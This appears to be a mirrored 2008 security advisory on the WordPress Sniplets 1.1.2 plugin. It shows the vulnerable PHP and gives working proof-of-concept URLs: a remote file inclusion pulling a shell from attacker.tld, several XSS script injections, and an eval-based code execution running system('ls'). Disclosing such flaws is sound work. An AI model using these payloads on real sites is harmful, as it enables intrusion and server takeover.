Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19278
HistoryFeb 26, 2008 - 12:00 a.m.

Wordpress Plugin Sniplets 1.1.2 Multiple Vulnerabilities

2008-02-2600:00:00
vulners.com
7

########################
Wordpress Plugin Sniplets 1.1.2 Multiple Vulnerabilities by NBBN
########################
1) Remote File Inclusion

File: /modules/syntax_highlight.php
Register Globals: ON
Vuln code:
<?php

/* Name: Syntax Highlight */
include_once ("$libpath/geshi/geshi.php");

Poc:
http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://attacker.tld/shell.txt?

2) Cross-Site Scripting

Register Globals: ON
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/sniplets/warning.php?text=&#37;3Cscript&#37;3Ealert&#40;&#37;22XSS&#37;22&#41;&#37;3C/script&#37;3E
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/sniplets/notice.php?text=&#37;3Cscript&#37;3Ealert&#40;&#37;22XSS&#37;22&#41;&#37;3C/script&#37;3E
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/sniplets/inset.php?text=&#37;3Cscript&#37;3Ealert&#40;&#37;22XSS&#37;22&#41;&#37;3C/script&#37;3E
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/admin/submenu.php?url=&#37;22&#37;3E&#37;3Cscript&#37;3Ealert&#40;&#37;22XSS&#37;22&#41;&#37;3C/script&#37;3E
http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/execute.php?text=&#37;3Cli&#37;3E

Register Globals: Off

Vuln Line:(3) <input type="hidden" name="page" value="<?php echo
$_GET['page'] ?>"/>
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/admin/pager.php?page=&#37;22&#37;3E&#37;3Cscript&#37;3Ealert&#40;&#37;22XSS&#37;22&#41;&#37;3C/script&#37;3E

3) Remote Code Execution

Register Globals: ON
Code:
<?php
/* Name: Execute as PHP */
if (substr ($text, 0, 4) == '<?php')
$text = '?>'.$text;

eval ('?>'.$text);
?>

Poc:
http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/execute.php?text=&#37;3C?php&#37;20system&#40;&#37;22ls&#37;22&#41;;